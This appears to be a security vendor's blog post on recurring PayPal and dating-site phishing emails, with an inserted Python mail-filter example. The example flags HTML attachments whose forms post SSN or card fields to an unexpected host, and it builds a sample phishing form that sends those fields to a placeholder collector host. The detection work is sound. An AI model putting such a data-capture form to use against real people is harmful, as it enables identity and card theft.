Classic Scams: Paypal and Dating Phishing Emails Just Won’t Go Away

When you analyze close to 15 BILLION pieces of email and Internet data daily, you see a lot of different cyberthreats. A rare few are unique and original, but the vast majority are variations on the same themes that have been used successfully by cybercriminals for the last few years. As a reminder to our readers, we thought we’d feature a few “classic” phishing emails that just won’t go away.

Paypal—Once a Target, Always a Target 

Paypal is a great service that is used by 152 million customers in 203 markets worldwide; these customers send, receive, and hold funds in 26 different currencies. Many small businesses rely heavily on Paypal, so as a cybersecurity professional, you really get annoyed when you see Paypal phishing scams creeping through, targeting unsuspecting users.

CYREN analysts discovered this version just last week. In this rendition, the cybercriminal did not link to a website; instead the user is instructed to open an attached HTML file called “formattachment.html”.

When opened, the HTML file launches the browser and the user sees:

In the right-hand navigation, the cybercriminal behind this scam uses clever social engineering by encouraging users to “Protect Your Account Info”, reminding them to never give their password to anyone, including Paypal employees. And, in fact, the phishing form itself does not ask for a password. (Of course, it does ask for a Social Security Number and credit card information.)

When the victim clicks “Submit Form”, the form data is sent directly to the cybercriminal. CYREN tested the recipient site and found that it did not respond with malware, so the site is likely designed as a data capture point for phishing purposes.
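For mail filtering, the pattern described above (a named HTML attachment whose form posts identity or card fields to a host unrelated to the claimed brand) can be checked mechanically. The following is an added example, not CYREN's code; the `SENSITIVE` keyword list, the `collector.example` host, and the form field names in the constructed sample are assumptions.

```python
from email import message_from_string
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field-name fragments hinting at identity or card data (assumed list, tune locally).
SENSITIVE = ("ssn", "social", "card", "cvv", "expir")

class FormFinder(HTMLParser):
    """Collects each <form> action and the names of the inputs inside it."""
    def __init__(self):
        super().__init__()
        self.forms, self.in_form = [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "fields": []})
            self.in_form = True
        elif tag in ("input", "select", "textarea") and self.in_form:
            self.forms[-1]["fields"].append((a.get("name") or "").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self.in_form = False

def scan_message(raw, expected_domain):
    """Flag HTML attachments whose forms send sensitive fields to another host."""
    findings = []
    for part in message_from_string(raw).walk():
        if part.get_content_type() != "text/html" or not part.get_filename():
            continue  # only named HTML attachments are of interest here
        finder = FormFinder()
        finder.feed(part.get_payload(decode=True).decode("utf-8", "replace"))
        for form in finder.forms:
            host = (urlparse(form["action"]).hostname or "").lower()
            trusted = host == expected_domain or host.endswith("." + expected_domain)
            hits = [f for f in form["fields"] if any(s in f for s in SENSITIVE)]
            if host and not trusted and hits:
                findings.append({"file": part.get_filename(), "post_host": host, "fields": hits})
    return findings

def sample_message(action="http://collector.example/post"):
    """Constructed sample mail; host and field names are placeholders, not the real lure."""
    msg = EmailMessage()
    msg.set_content("Please open the attached form.")
    html = (f'<form action="{action}" method="post"><input name="fullname">'
            '<input name="ssn"><input name="card_number"><input type="submit"></form>')
    msg.add_attachment(html.encode(), maintype="text", subtype="html", filename="formattachment.html")
    return msg.as_string()
```

Forms with a relative or empty `action` are not flagged by this check, since they carry no host to compare against the expected domain.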

Even True Love is a Target

Dating is a popular phishing and spam target, and this week singles seeking that one special person were enticed by a phishing email purporting to be from Christianmingle.com. Like the vast majority of phishing scams, the website looks entirely legitimate.

However, a closer look at the website address “vernonphilander.co.za” shows that the site has no relationship to the real christianmingle.com site. It is a good example of how cybercriminals regularly either hijack legitimate sites or create sites using the names of sports figures and celebrities.

In this case, Vernon Philander is a South African cricket player. The Vernon Philander website looks like this.

It’s unclear whether Mr. Philander has created a legitimate site for fans that cybercriminals have hijacked, or whether the cybercriminals used his name to create a fake site.